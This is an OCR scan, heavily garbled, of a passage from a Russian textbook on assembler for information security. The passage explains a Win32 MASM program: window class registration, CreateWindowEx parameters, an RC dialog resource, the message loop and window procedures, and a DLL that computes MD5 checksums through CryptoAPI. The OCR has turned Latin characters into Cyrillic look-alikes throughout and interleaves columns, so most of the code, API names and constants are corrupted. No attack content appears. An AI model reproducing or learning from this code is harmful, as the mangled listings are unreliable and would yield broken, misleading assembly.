ном соблюдении протокола ее вызова. В нашем случае это функция ТезРипсНоп из биб- 
лиотеки гзсарй.41. Библиотека плзсарй.4П должна находиться либо в текущей директо- 
рии с исполняемым модулем п145.ехе, либо в одной из системных директорий \Мт4о\в. 
В случае неуспеха вызов СеРгосез$АЯгез$ возвращает МОГГ, и, соответственно наша 
программа, предварительно выгрузив библиотеку из памяти, завершает работу. Такая 
ситуация может возникнуть в случае, если ОЫ, с именем плзсарй.а1 будет доступна, во 
в ней отсутствует функция с именем ТеяРипсНоп. 
Следующий блок кода формирует основное окно программы. 


1пуохе ЗНомИ1пдом, [ма1п_и1п_Вапа1е],$И_МОВМАТ 


Для того чтобы приложение \/4о\из обладало собственным окном, необходимо заре- 
гистрировать класс окна, на его основе создать новое окно, провести его первичную отри- 
совку (инициализацию изображения окна) и организовать цикл обработки сообщений. 

Вызов Се МодшеНапе возвращает описатель исполняемого модуля п\5.ехе нашей 
программы, что необходим для дальнейшей манипуляции с ресурсами программы. 

Как уже говорилось, для создания окна У п4о\$ программе необходимо зарегистри- 
ровать класс окна — структуру типа УМРСГА$$, поля которой описывают основные 








\ пуоке беемоди1еНапа1е, 0 свойства производных от нее окон. 
ЩОУ [171$] ,еах ИМОСЬА$5 ЗТВОСТ 
$Еу1е ИОВ ? 
поУ [<] а$5_зЕгисе.55у1е], С$ _НВЕРВАМ ог С5$ УВЕРВАЙ 1рЕп\ирпаРхос РИОЕО ? 
МОУ [<] а55_5ЕгмсЕ, 1рЕлИпаРхгос], оЕЁзес М1паомРгос СЬС1зЕхега ОИОВО ? 
МОУ [<] а55_5Егисёе. срС15Ехёга],0 срИпаЕхега РИОВО ? 
оу [с1аз5_зегисе. срИипаЕхега! , 0 Впзбапсе РИОКО ? . 
мои [с1а5$_зЕхгисе. ПТпзсапсе] , еах В! соп ОИОВО ? 
АСитзот ИОВ 2 
1пуоке ВоааТсоп, 0, ТОТ _АРРЬТСАТТОМ ВЬгВаскагонпа ИОВ 2 
ОУ [с<1а55_5Егисё.ВТсоп],еах ]рз2МепиМацще ИОВ ? 
1рз2С1аз5Маще ОИОВр ? 
| 1пуоке Гоа9Сиузог, 0, ТРС_АВКОИ ЯМрСтА5$ — ЕМО$ 





| ЩОУ [с1аз5 _зЕхгисе. ИСигзог] ‚ еах 
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А к: 


к/е — стиль окон, создаваемых из этого класса. Возможно комбинирование нескод,_ 
и и 

ких стилей посредством оператора "ог". . р 

1рё\УпаРгос — адрес процедуры окна, ответственной за обработку сообщений ве 
окон данного класса. . 

сЬС15Ехна — количество дополнительных байтов, которые нужно зарезервироват, 
(будут следовать в памяти сразу за самой структурой). По умолчанию, операционна, 
система инициализирует это число нулем. 

Нтапсе — описатель исполняемого модуля программы. 

Ысоп — описатель отображаемой иконки в верхнем левом углу экземпляра окна да, 
ного класса. 

ЬСшгзог — описатель курсора мыши при расположении его над окном. Информаци 


об оконных стилях, типах курсоров мыши и иконок можно найти в документации М. 


Р1аМогт $ОК. Функции Гоа@соп и Гоа@Сигзог возвращают соответствующие описател 
курсора и иконки для зарезервированных в ОС \!шдо\$ или размещенных в разделе р, 


сурсов иконок и курсоров. 


НЬгВаскагочипа — цвет фона окна. 
1р52МепиМапе — описатель меню для окон, созданных на базе данного класса. 


1р52С1аз5Маше -— символьное имя класса окна. 


Ысоп$т — описатель «маленькой» иконки, которая сопоставляется классу окна. ь 
Н 
этот элемент структуры равен МОМ, система ищет иконку, определенную для элем 
Ысоп, чтобы преобразовать ее размер. . 
Самый важный член \УМОСГА$$ - это р\паРгос. 1р1 означает дальний указате 
на функцию. Каждому классу окна должна быть сопоставлена процедура окна, котор 
. о 
ответственна за обработку сообщений всех окон этого класса. М! тдо\з посылает © 
шения процедуре окна, чтобы уведомить его о важных событиях, касающихся ок 
мы 
которые она ответственена, например о вводе с клавиатуры или перемещении м ь 
Процедура окна должна избирательно реагировать на получаемые ею соо и сия 
разработке процедуры окна большая часть ее кода представляет собой обработ 
бытий этих событий. , 
Заполненная структура с1аз$ 5тгис{ передается в качестве параметра вЫ 
1 системе. 
Кер1\егС1аз5 для регистрации класса в . а 
Затем вызов Сгеае\УИшдомЕх создает персональное окно нашей программе. Оп 
параметров данной функции приводятся ниже. 


Стеасей1паомЕх ргобо ЧмЕхбеу1е: ОМОВР, \ 
1рС1аззМаще : ОМОВО, \ 
1рИ1пдомМаще : РИОВР, \ 

Зи су1е: МОБ, \ 
Х: ОИОВО, \ 
У: РИОВО, \ 
ПИ ЧЕН: ОИОВО, \ 


_ 
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Эра ОВО ООН Иан сана он оч онно оно свичи оч он онннаюоаноченаавая Пора о Но вина а пани но нон оносоосвиое 
..." 

„я 
‚ 


пНезчве : ВМОВО, \ 
вИпаРагеле: ОИОВО ,\ 
мела : ОМОВР, \ 
в1пзбапсе: РИОВО, \ 
1рРагам; ОИОКО 


д\ЕхЗУе — дополнительные стили окна. Здесь можно указать новые стили окон, 
появившиеся в \Мтдо\з 9х и МТ. Обычные стили окна указываются в 45 {Уе, но если 
нужно придать окну дополнительные стили, такие, как \юри\0${ окно (которое всегда 
наверху), вы должны поместить их здесь. В случае значения МИТТ, дополнительные сти- 
ди не используются. 

рС!аззМате — обязательный параметр. Адрес АЗСНИ строки, содержашей имя класса окна, 
которое вы хотите использовать как шаблон для нового окна. Это может быть ваш собственный 
зарегистрированный класс или один из предопределенных классов. Как отмечено выше, каждое 
создаваемое окно основывается на некотором зарегистрированном классе. 

1р\/шао\Мате — адрес АЗСПЙ, строки, содержащей названия окна. Оно будет отра- 
жено в строке заголовка окна. Если этот параметр будет равен МОТЛ,, заголовок окна 
останется пустым. 

ду — стиль окна. Существует некоторое количество предопределенных стилей, объе- 
диняемых оператором "ог" и задающих параметры определенных элементов окна. Можно 
передавать значение МОМ. в этом параметре, тогда у окна не будет кнопок изменения 
резмеров, закрытия и системного меню, но болыного прока в этом нет. Самый общий стиль 
\5 ОУЕКГАРРЕБУТМРО\, -— это в действительности комбинания некоторого числа пре- 
допределенных стилей, наиболее подходящая для болынинства типов окон. 

Х, У — координаты вернего левого угла окна на экране компьютера. Обычно эти зна- 
чения равны С\/_ ОЗЕРЕЕРАЧЕТ, что позволяет \/Ит4о\з самостоятельно решать, куда 
поместить окно. 

п\/а!, пНеем — ширина и высота окна в пикселях. Вы можете также использовать 
СУ Ч$ЕРЕРАЧТЛ, чтобы позволить \Ипдо\$ выбрать наиболее подходящие размеры за вас. 

В\УпаРагеп! — описатель родительского окна (если оно существует). Этот параметр 
говорит \/ шоу, является ли это окно дочерним (подчиненным) другому окну. Заметь- 
те, что это не родительско-дочерние отношения окна МО! (пиру доситеп! ииегасе). 
Дочерние окна не ограничены границами клиентской области родительского окна. Эти 
отношения нужны для внутреннего использования \шдо\з. Если родительское окно 
УНичтожено, все дочерние окна уничтожаются автоматически. Так как в нашем примере 
8сего лишь одно окно, мы устанавливаем этот параметр в МОГ. 

ПМепи — описатель меню окна. МОЛ, — в случае‘использования меню, определенного 
8 классе окна 1р52МепиМате структуры \УМОСЬА$$ «по умолчанию». Каждое окно, 
‘озданное на базе класса будет иметь меню по умолчанию, если в вызове 
Стваве\Утао\уЕХ вы не определите специально новое меню, используя параметр ВМепи. 

ОТ параметр двойного назначения. В случае если ваше окно основано на одном из 
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предопределенных \Ут4о\$ классов окон (как правило, элементов управления), оно ; 
может иметь меню. Тогда ВМепи используется как его Ш. \Ипд0\и$ может определит 
действительно ли ЮМепи — это описатель меню или же 2, проверив парамез 
1рС!аз$Мате. Если это имя предопределенного класса, ВМепи - это идентификатс 
контрола. Если нет, это описатель меню окна. 

Ыюзапсе — описатель программного модуля, создающего окно. 

\рРагат — опциональный указатель на структуру данных, передаваемых окну. Испол 
зуется окнами МПИ, чтобы передать структуру СПЕМТСВЕАТЕ$ТКОСТ. Обычно эт 
параметр устанавливается в МОРЕ, означая, что никаких данных через Стеае\ доу 
не передается. Процедура окна может получить значение этого параметра посредсть 
вызова функции Се М тао\$ Гоп. 

После создания окна вызовом Сгеае\/тдо\Ех возвращенный его описатель сохраь 
ется для дальнейшего манипулирования окном. | 

Следующий вызов СтгеаеГ\аозРагат заполняет наше вновь созданное окно элеме- 
тами взаимодействия с пользователем, превращая его в диалоговое. Эта функция по; 
чает 5 параметров: описатель модуля, создающего окно, шаблон диалогового окна (01 
сание элементов содержится в файле ресурсов т@5.гс), описатель окна, которо 
принадлежат элементы диалога, адрес функции, обрабатывающей события от элемен 
управления диалога, и — 32-битная константа, которая передается функции обрабо- 
сообщений диалога вместе с сообщением \М_ПИТРАГОС в параметре 1Рагат. 

Итак, как видно из текста программы п145.азт, функция СЬНа0еРгос должна по 
чать и обрабатывать все сообщения элементов диалогового окна. 

В случае успешного завершения создания окна диалога его описатель сохраняе 
для возможности дальнейшей работы с его сообщениями и вызовом Звом/\А ао окнь 
впервые отображается на экране компьютера. 

Сейчас следует немного отойти в сторону от исследования кода приложения пФ 
и рассмотреть его файл ресурсов т@5.гс, чтобы получить ответ на вопрос, каким образом 
вызов СтеаеГ1аосРагат наполнил наше окно элементами диалога. 


; 095. ЕС 
#1пс104е "\пазм32 \1пс1и9е\ гезоцхсе, В" 





+деЕ1пе ТЮМ_РТЬЕ_ЕХ1Т 100 
+ деЕ1пе ТОМ_НЕЪР_АВООТ 900 
{ЧеЕ1пе 120_СНтТьв_БЬб 00 
+ЗеЁ1пе ТОС ТМРОТ_ЕБТТ 000 
}деЕ! пе 10С_ООТРОТ ВОТТ 1001 
4$деЁ1пте 10С_КЕУ_ЕПТТ 1002 
4{ЗеЁ1пе 10С_60_ВОТТОМ 1008 
+еЁ1пе 10С ЕХТТ ВОТТОМ 1009 


#ЗеЁ1пе 5 _ТАВСКР {И3_ТАВЗТОР | №5 _С ВОР) 
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р 
| 
| 
| 
| 
| 
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МЗСАРТТ МЕМО 


ВЕСТА 
РОРОР "&Е11е" 
ВЕСТМ 
МЕМОТТЕМ "ЕЗхуь" ТОМ 
о , _ЕТЬЕ_ЕХ1Т 
РОРИР "&Не1р" 
ВЕСТИ 
МЕМОТТЕМ "вАБОоЦЕ..." 
о , ТОМ_НЕБР_АВООТ 
ЕМО р 


120_СН1ЬО_0Е6 21АЪОб ОТ5САВОАВЬЕ 0, 0 
ЗТУБЕ 0$ _ЗОЪООК | ИЗ УТЗТВЬЕ | И5 СН 
РОМТ 8,"М5 Запз бег1" ^ 
ВЕСТМ 
ЕОТТТЕХТ 
#5 ТАВСВР 


ЕРТТТЕХТ 12С_ООТРОТ_ЕБТТ, 
#5_ТАВСВР | $ РТЗАВТЕР ^ 


309, 95 


ТС _ТМРОТ_ЕРТТ, 48,7,222,14, Е$ _АОТОН$СВОЬЬ | 


48,24,222,14, Е АПТОНУСВОЬЬ | 


о "Вол", Т0С_60_ВОТТОМ, 167,41,50,14, И$ ТАВСВР 
"ЕХТЕ"и, ' у `_ 
в ТАВСАЕ Т2С_ЕХТТ_ВОТТОМ, 220,41,50,14, 
ЬТ н .н 
Е ТЕАТ и разв, ТРС_5ТАТТС, 7, 27,40, 8 
прие зех1па:" | 
10, 40.8 9:", ТрС_5ТАТТС, 


ЕМр ^ 


я прложений У пдомз создаются отдельно от файлов текста программы 
ется вр зультирующий исполняемый модуль на этапе линковки. Подавляю- 
ое а ‚ресурсов содержится в специальных файлах 
иполняемого файла программы. в нашем Ре а п ПОВтелает с именем 
ке До мы ресурсов, такие, как меню, диалоги, описываются на специальном 
РЫСИ сы пример иконки, курсоры, изображения, тоже описываются 
а ен Насть их описания является последовательностью шестнадцатирич- 
И ро па ия ресурсов пользуются специальными средствами — 
а рами Ро и и позволяют создавать ресурсы, визуально контролировать 
ность их создани , его сохранять их в формате файла ресурсов. 

и ты тся смешанный“ способ редактирования ресурсов. Например, при 

ировании диалоговых окон достаточно трудно точно установить эле- 
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менты диалогового окна. После приблизительной расстановки визуальными средствам, 

и сохранения в соответствующем файле осуществляется редактирование параметрь 

элементов в ВС-файле в обычном текстовом редакторе. Среда разработки КадАЗМ рах. 
полагает средствами визуального редактирования ресурсов приложений, доступными и, 
меню Ргодес/АЯЯ Ме\м и имеет соответствующий режим создания диалоговых окон, ме. 
ню, идентификаторов ресурсов. 

При создании ВС-файлов программист сталкивается с тем, что некоторые ресурсы, 
такие, как иконки, курсоры, диалоговые окна, изображения (Ыбпар'ы), могут быт, 
сохранены в отдельных файлах с расширениями 4с0, ‚сиг, „№, Бтр, соответственно, 
В этом случае в КС-файлах делаются ссылки на упомянутые файлы посредством дирек. 
тивы шсш4е. 

Анализ файла п@5 тс показывает, что интерфейс программы, кроме непосредственно окна 
\Уидо\мз, состоит из системного меню и диалога с несколькими элементами управления: по- 
лями редактирования, статического текста и кнопок. Описание синтаксиса ВС-файла можно 
найти в библиотеке разработчика МОМ. Каждому элементу управления сопоставлены чис- 
ленные идентификаторы для ссылки на них в вызовах обработки сообщений. 

Файл ресурсов для размещения последних в исполняемом модуле должен быть 
откомпилирован специальным компилятором ресурсов (среда Ка4А$М делает это авто- 
матически при наличии файла ресурсов в проекте). Для этого в нашем случае вызывается 
утилита ВС.ЕХЕ из пакета МАЗМЗ?. 

После компиляции файла ресурсов компилятором ресурсов создается новый файл, 
имеющий расширение .КЕ$. Именно этот КЕЗ-файл используется линковщиком для до- 
бавления ресурсов в результирующий исполняемый модуль. Следует отметить, что при 
необходимости КЕ$-файлы могут создаваться и редакторами ресурсов. Выбор пути по- 
лучения готовых ресурсов зависит от предпочтений разработчика. 

Вернемся снова к обсуждению исходного текста программы т45. После отображения 
основного окна программы необходимо запустить так называемый цикл обработки 
сообщений для возможности отбора, трансляции и передачи оконной процедуре собы- 
тий, происходящих с соответствующими элементами управления. 


59 _100р: 
1пуоке РееКМеззаде, оЕЁзее пеззаде, 0,0,0,РМ_ВЕМОУЕ 
о: ах, ах 
9? по _меззаде 


1пуоке 1зр1а109Меззаде, [ср114_919_Пап91е] , оЕЁзеЕ пеззаде 


ох еах, еах 

912 по_пмеззаде 

спр пеззаде .пеззаче, ИМ_ООТТ 
3е епа_1оор 


1 пуоке Тгапз 1 а еМеззаде, оЕЁзее щеззаде 
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1 пуске 01 з;рабс|Меззаде, оЕЁзее пеззаде 


гс _пеззаде: 
пр п39_1оор 


Во время работы приложения \Ип9о\з не отправляет поток вводимых данных непо- 
средственно ему. Вместо этого, она помещает все события мыши и клавиатуры, элемен- 
тов управления в общую очередь сообщений. Приложение должно самостоятельно счи- 
тывать данные из этой очереди: извлекать сообщения и распределять их так, чтобы 
оконная процедура могла их обработать. 

Функция РееКМезаре проверяет, есть ли в очереди сообщений "что-либо подходя- 
шее", и, если есть, извлекает сообщение из очереди в заданную структуру (в нашем слу- 
чае — теззаре). 

Стеакей1пдомЕх рхобо 1рМза: ОМОВЬ, \ 

вла : РИОВО, \ 

УМЗЗЕ1 1 ЕехМ1п : ОМОВО, \ 

иМ5аЕ1 1 сехМах ; ОИОВО, \ 

иВемоуем5ча ; ОМОВО, \ 


1РМ$2 -— указатель на структуру М$О, которая принимает информацию из очереди 
сообщений потока. 

В\\п4 — описатель окна, чьи сообщения должны быть извлечены. Окно должно при- 
надлежать вызывающему потоку. Значение ПУСТО (МОШ.) имеет специальное предна- 
значение: 

\М$РЕЩеМт — определяет целочисленную величину идентификатора самого 
маленького значения сообщения, которое будет извлечено. Используйте сообщение 
УМ _КЕУНБЕ$Т, чтобы задать первое сообщение клавиатуры, или УМ_МОЧЗЕЕВ$Т, 
чтобы задать первое сообщение мыши. — 

\М$ЕЩегМах — определяет целочисленную величину самого большого значения 
сообщения, которое будет извлечено. Используйте сообщение \М_КЕУТАЗТ, чтобы 
задать первое сообщение клавиатуры, или УМ _МОЧЗЕГА$Т, чтобы задать последнее 
сообщение мыши. 

Если “М; Ее Ми и “Мз2ЕШег Мах являются оба нулевыми, функция РееКМеззаее 
возвращает все доступные сообщения, т. е. никакой фильтрации в диапазоне значений не 
выполняется. 

\КетоуеМ$52 — в зависимости от значений (РМ_МОКЕМОУЕ или РМ_КЕМОТУЕ) опре- 
деляет, следует ли копию извлеченного сообщения отставить в системной очереди или нет. 

Если функция РееКМеззаге успешно извлекает какое-либо сообщение, не УМ_ОТ, 
величина возвращаемого значения не нуль. Если функция извлекает сообщение 
УМ от, величина возвращаемого значения - нуль. 
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Вызов 13П1аоМеззаре определяет, предназначено ли данное сообщен, 
для диалогового окна и если да, то соответствующая оконная функция обрабатывает ег. 
В ходе выполнения функции 15ПлаюзМеззаре \Мтдо\з проверяет, есть ли в ок; 


с указанным описателем элементы управления вообще, и если они есть, то выполняете. 


последовательная посылка ряда сообщений им для смены текущего элемента управлен, 
при нажатии комбинаций клавиш смены фокуса. 


В случае если оконная функция возвратила 0, а следовательно, и Раю Ме5за, 
вернет это значение, т. е. сообщение было успешно обработано, дальнейшее процессир . 
вание его должно быть прекращено. В случае ненулевого возврата происходит дальне. . 


шая обработка вызовами Тгапа4еМеззазе и О1зрас\Меззаде. 


Функция Тгапз]аеМеззасе переводит сообщения виртуальных клавиш в символьн 


сообщения, которые помещаются в системную очередь сообщений вызывающего пото. 
для прочтения на следующей итерации цикла обработки сообщений. 

Функция П15расМеззаее отправляет каждое оттранслированное сообщение соотв 
ствующей оконной процедуре. Принимающей оконной процедурой в нашем случае яв; 
ется УПпдо\Ргос. Итак, все сообщения диалогового интерфейса (поля ввода, кнопь 
обрабатываются функцией СЬИаГРгос, а команды манипулирования главным окн 
программы и системного меню — У/тдо\/Ргос. 

Рассмотрим, как происходит обработка манипуляций оконной функцией \/Мтдо\Рг 
Каждая оконная процедура получает сообщения системы посредством вых 
РузракйМеззасе в цикле обработки сообщений. Это могут быть сообщения управле! 
окном или сообщения о вводе данных. Необязательно обрабатывать каждое сообще 
в своей оконной процедуре, его можно переправлять системе для обработки по умолчан 
при помощи вызова функции РеР\тдо\Ргос. Сообщения, требующие обязательной об 
ботки, имеют идентификаторы \/М_РАГ\УТ, УМ_СОММАЮР и УМ РЕЗТВОУ. 

Что такое сообщение оконной функции? Сообщение оконной функции -— это стру` 
ра типа М$С, возвращаемая из системной очереди сообщений одним из вызовов выб 
ки сообщений, возможно, оттранслированная и отправленная в качестве второго пе. 
метра для оконной функции. 


М$б ЭТВОСТ 
Нипа ржОво ? 
цеззаде ОМоОво ? 
мРагам ново ? 
1Рахац рЖОво ? 
{1ще ржовро ? 
ре РОТМТ <> 

М$С ЕМО$ 


В\уп4 — описатель окна, оконная процедура которого принимает сообщение. 


шеззасе — определяет иденнтифткатор сообщения. Приложения могут использовз" 


только младшее слово; старшее слово зарезервировано системой. 


а — 
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иво о ионов ооо но нения е 
КЕ РР И 
зазвав 


\Рагат — определяет дополнительную информацию о сообщении. Точное значение 
зависит от значения члена структуры теззаре. 


1Рагат — определяет дополнительную информацию о сообщении. Точное значение 
зависит от значения члена структуры теззаре. 
ише — определяет время, когда сообщение было помещено в очередь. 


р - хранит позицию курсора в экранных координатах в момент, когда сообщение 
было помещено в очередь. 


Оконная функция нашей программы выглядит следующим образом. 


и: паомРгос ргос 39са11, @@Нупа: нога, Фета: Зноха, 


#6] рагам: нога @мрагам: Чноха, 
ризпаа 


поу еах, @@мп5а 


стр еах, ИМ _РЕЗТВОТ 
Зе ЧезЕхоу ч1пдон 


спр еах, ИМ _СОММАМО 
Зе @@Нала1е_Соммата 


@@реЁац1Е Рхос: 
рораа 


1пуоке БеЁёи! пдочРтос, Била, @Фимза, @ @мрагам, @@1рагам 
тес 


@Напа1е_Соппапа: 


Во еах, @@ирагам 
моу Ьх, ах 

фа еах, 16 

спр ах, 0 


ле @Регац1Е _Ргос 


сир Ьх, ТОМ РТЬЕ_ЕХТТ 
3е Е11е_ех1е 


спр Ьх, ТОМ НЕБР АВООТ 
3е ароце 


) пр @@реЁац1Е _Ргос 


ароць: 


а 1пуоке МеззадеВох, [ма1п_и1п_Нап@1е] оЕзек 
оцЕ_Е1Е1е, МВ_ОК 


аронЕ _зЕх119, оЕЕЗее 
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ХОЕ еах, еах ` 3е Ех: Е Ваббоп 
ге ю 
3пр Ропе_МоЕ _Нап41е8 
Е11е_ех1®: 
с1озе_ех1®: ‚ 


Чезетоу эта: ий р 11 1а112е: 
1пуоке Роз*0и1ЕМеззаде, пр Ропе Напа1еа 
рораа ^ 
ХОГ еах, еах до БицЕбол : 
гее 7 
И: пбоиРхос епар . 1пуоке беер191%ещ, [с1118_919 ВапЯ1е],10С 1МРОТ ЕРТТ 


{пуске бееи1 пдомТехЕ, еах, оЕзеЕ гези1е ЪиЕех, 256 


Как нетрудно заметить, оконная функция принимает первые четыре члена структуры А ерх, оЁЕзек гези1е БиЕтек 
сообщения в качестве отдельных параметров. Логика ее работы чрезвычайно проста | ааа еЪх, еах - 
и заключается в обработке системных сообщений, а также и элементов оконного меню, По руЕе рег [еЪх],0 
В случае необрабатываемых команд, они просто передаются на обработку по умолчанию 
системному вызову. ег тдо\мРгос. ‚ разн оЕЁзеё хези1 раЕЁег 


При наличии сообщения \М_РЕЗТВОУ, что обычно вызвано закрытием окна, са11 [ТезеРипсе1 оп] 


в систему ставится на обслуживание вызовом РозЮчиМеззаре сообщение \УМ_ сп, 
принуждающее цикл сообщений завершить работу до того, как сообщение вернется 
оконной процедуре программы. 

Основной функционал обсуждаемого МУИпдо\з приложения заложен в функции обра- 
ботки диалога СЬИРеРгос, которая, стоит заметить, также является оконной функцей. | пр Ропе_Напа1ед 


.1Е еах==МмоЬЬ 


дпуоке беЕр19тТеецв, [сВ1149_919_Вап@1е],10С ОПОТРОТ ОТР 
1пуоКке б$еЕИ1паомТехь, еах, оЕЁзеЕ гези1Е ъиег 





Ех: ВиО: 


Св119019Ртос ргос 3&4са11, @@пипа:диога, @бищза: нота, @буратап: 4ной. 
| 1пуоке РозЕ0ц1ЕМеззаде, 0 


@@1рагам: нога 








разная ‚ Ропе_Напа1еа: 
рораа 

ВоУ еах, [ @@мп359] Шоу еах, 1 
ге 

| сир еах, ИМ_ТМТТОТАТОС 

$е ‚ 11161а112е Фопе_МоЕ Напа1ев: 
рорай 

сир еах, ИМ_СОММАМО Че а еах, еах 

пе Ропе_Мо& _Нап41е8 те 


СВ] 
Нап91е_Сомтапа: 119р219Ркос епдр 


те. 21: офиратап а так же, как и \!тдо\Ргос, должна обрабатывать сообщения, только уже отправ- 
о ь нее вызовом 1$П1ао2Меззазе. Для демонстрационных целей в функцию 
ЕРгос включен шаблон обработчика сообщения УМ _ПИТЬАТОС которое при- 


Ходит 
перед созданием окна диалога и 

я во м 
УНЦИИ. для возможной инициализации данных оконной 


спр ах, 10С_60_ВОТТОМ 
)е до _Бицевоп 


спр ах, 12С_ЕХТТ_ВОТТОМ 
































ео к ава в ом в ооо маи вова ив ооо ока ори о обв и ана оо сана вое ви а ово ро аа о ово ооо попав а рава о ни оао нае воравачиани нивы 1 


Основными ожидаемыми сообщениями являются нажатия кнопок ШС _С0_ Вот 
и ШС_ЕЖТ ВОТТОМ. Если с сообщением ШС_ЕХТ_ВОТТОМ все очевидно, то обр, 
ботчик РС_СО_ВОТТОМ мы сейчас подвергнем обсуждению. 

Наше диалоговое окно располагает элементом ввода данных (по смыслу програму 
сюда должна быть введена последовательность символов, для которой будет вычислят 
ся контрольная сумма по алгоритму МО5). Вызов Се еНет возвращает описатель эт 
го элемента, при помощи которого вызов бей тао\мТехи разместит его содержим, 
в памяти по адресу геза!: ЪайЙег и вернет размер в символах. 

Далее, полученная строка дополняется в конце нулевым значением и осуществляет 
вызов функции из нашей динамически загружаемой библиотеки тзсари.аЙ с передач, 
единственного параметра — адреса этой строки для расчета контрольной суммы М5, кол 
рая и заменит исходную строку. Результат работы экспортируемой функции, если не бы 
ошибок, будет размещен в элементе управления с идентификатором 2С_ОЧТРОТ Ер 
диалога вызовом Зе У шао\Техе. 

И, наконец, третий файл проекта т 45 — файл установок модуля п195.4е. 


. М5. ЗеЕ 
МАМЕ М5 
РЕЗСВТРТТОМ "М5 Вазй са1си]афот' 
БХЕТУРЕ ИТМООИ$ 
ТОВ 'ИТМЗТОВ. ЕХЕ' 
СОВЕ РВЕГОАР МОУЕАВЬЕ 
РАТА РВЕГОАО МОУЕАВЬЕ МОБТТРЬЕ 
НЕАРЗТ2Е 65536 
ЗТАСКУТИЕ 65536 
ЕХРОКТ$ М1 пдочРхос 


мого модуля. 


МАМЕ - имя исполняемого файла 
РЕЗСЕТРТТОМ — описание модуля 
ЕХЕТУРЕ — тип системного окружения 
ТОВ программная заглушка 

СОРЕ - свойства раздела кода 

ВАТА - свойства раздела данных 
НЕАРЗТИЕ — размер кучи 

ЗТАСКОТАЕ - размер стека 

ЕХРОВТ5 — экспорт 


































































































Параметры, перечисленные в нем, определяют свойства результирующего исполн* 
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5.5.2. Сервисная библиотека 


Перейдем к рассмотрению файлов проекта динамически загружаемой библиотеки 
пзсари- ЧИ. Реализация вычисления контрольной суммы МО5 последовательности сим- 
волов В ней базируется на использовании возможностей криптографических модулей 
операционной системы \тдо\5 — Сгурю АР]. 


; пзсар1е.азт 


‚386 

„вобе1 Е1ае, зЕ9са]11 

орЕ1оп саземар: попе 

}пс1аде \пазм32\1пс]иде\и1пдомз. 1пс 
3пс1а4е \пазщ32\1пс1иде\а$уар132.1пс 
3 с1а4е \пазм32\1пс]иде\изег32.1пс 

3 пс]109е \пазм32\1пс1иде\ Кегле1 32. 1пс 


пс1449е11Ъ \пазщ32\11Ъ\цзех32.11Ь 
]пс1148е11Ь \пазщ32\11Ъ\Кехпе132.11Ь 
11с109е11Ь \пазм32\11Ъ\а9уар132.11Ь 


01зр1ауЕтгог РКОТО :БМОВО 
Вусетобех РВОТО :ОИОВО, : ОМОВО, : ОМОВО 


„ СОП$Е 

АЁб _$10_МО5 ечи ООООСООЗН 

РВОУ_В$А_РОШЫ ечи 000000015 

НР_НАЗНУАЬ еац 000000028 

АТС _СТА$$ _НАЗН | еац 000080008 

АБС _ТУРЕ_АМУ ечи 000000008 

СВУРТ_УЕВТРУСОМТЕХТ еац ОРОООООООН 

САШб_МО5 еаи АБС _С1АЗ$ _НАЗН ОВ АБС _ТУРЕ_АМУ ОВ 
№.6_$10_МО5 

НСКУРТРКОУ ТУРЕПВЕЕ РИОВО 

НСВУРТНАЗН ТУРЕБЕР ВИОВО 

‚Дафа 

.1ЬМапе ар "сгурЕо. 811", 0 

ЕггогМеззаде [69°] 512 Чир (0) 


МАКЕГАМСТР МАСВО р, $ 
хог еах, еах 
поу еах, 5 
311 еах,10 
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хог ебх, ебх 

моу еБх,р 

ог еах,ерх 
ЕМОМ 


‚ соде 

211Елёгу рхкос ВТозЕРЬЬ: Н1М$ТАМСЕ, геазоп : ВИОКВО , гезегуеч] : РМОВО 
шоу еах, ТВОЕ 
те 

1 1ЕлЕку Епар 


ТезеРипсе1оп рхос изез ез1 е41 1рзех1п9д: ВНОВЬ 


ЪОСАЬ ВСгурЕРгох: НСВУРТРВОУ 


ОСА ПНазь : НСКУРТНА$Н 

ЪОСАЬ ЗиГепаен :ОИОВО 

ЪОСАЬ зНазв [512] :ВУТЕ 

1 пуске СхурсАсач1 хесопфехь, АРОК ВСгурЕРтот, МОТЬ, МТ 


РВОУ_В$А_РОБЬ, СВУРТ_УБВТЕУСОМТЕХТ 


.1Е еах==0 
] пр еггог 
‚.ЕЬЗЕ 


1пуоке СгуреСхкеа®еНазй, ПСхурЕРгом, САЪб_МО5,0,0,АООВ ПНазв 


.]Е еах== 
)пр егког 
.ЕЬЗЕ 
1пуоКе 1зЕх|еп, 1рзет1 19 
МОУ ЗиВепчЕН, еах 
1пуоке СгурЕНазНБаба, Назь, рэпа, АмЪепден, 0 


.1Е еах== 
пр еггог 


‚Е.Е 
ПОУ Зирепчен, $1Т7ЕОЕ зНазН 
1 пуоке СгуребееназПРахам, ВНазН, НР_НАЗНУАЬ, АРЬЕ 
зНазй,АШОВ ЧмЬепчев, 0 , 
.1Е еах== 
пр еггог 


.ЕЬбЕ 


1пусоке ВусеТобег, амЬепаев, АООВ 
зНазй, 1рзёх119 


№ 


ока киаьиоал ЛЬНЫЕ 
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1пуоке СгурЕБезЕгоуНази , ННазН 
ХОг еах, еах 
вр ех\ 


„БМОТР 


. ВМОТЕ 


1пуоке СгурЕВе ] еазеСоп(ехЕ, НСгурЕРгом, 0 


.ЕМОТЕ 
‚ЕМОТЕР 
егхог: 
1пуоке бееТазеЕтгог 
1пуоке 01 зр]ауЕггог, еах 
‚ОУ еах, -1 
ех1 4: 
ге 


ТезеРипсе1оп епар 


211зр1ауЕгхгог РВОС ЕггогТЬ: ОМОВЬ 
МАКЕВАМСТО ТАМСб_МЕОТВАЬ, ЗОВЬАМС РЕРАЧЬТ 
1пуоке Ю 
гогпа<Меззаде, РОВМАТ_МЕЗЗАСЕ РВОМ ЗУЗТЕМ, МОЬЬ, Ехгох 10, еах, ОРЕЗЕТ 
ЕтгогМеззаде, 512, МОБЬ 
1пуоке 
Ъ:БМаме, МВ_ОК 
гее 
21зр1ауЕтгохг ЕМОР 


МеззадеВох, МОЦЬ, ОРЕЗЕТ ЕггогМеззаде, ОЕРЗЕТ 


ВусеТобег РВОС еп: риОоВЬ, рАгтау: БИОВО, р5Ег: РИОВО 
ЩО есх, еп 
моу ез:, рАгкау 
поу е91,р5Ег 
10 ЗВ 
хх: 
оу а1,Рубе рёг[ез1] 
ап а1,ОРОН 
$Вг а1,4 
.1Е а1<=9 
аб а1,"0" 
| е Бусе рег [е91],а1 
.БЬЗЕ 
5 а1,10 
а99 а1,"А" 
| Бубе рёх[е91],а1 





уж 


Зет 





352 Ассемблер в задачах защиты инфо 


, аваров ин иянини зная чо о ооо чачочоча о паче т ии оооооововьь еее инь МаЦи 
„ЕМОТР 
1пс еЗ1 
ме а1, Бубе рег [е$1] 
апа а1, СЕН 
‚Е а1<=9 
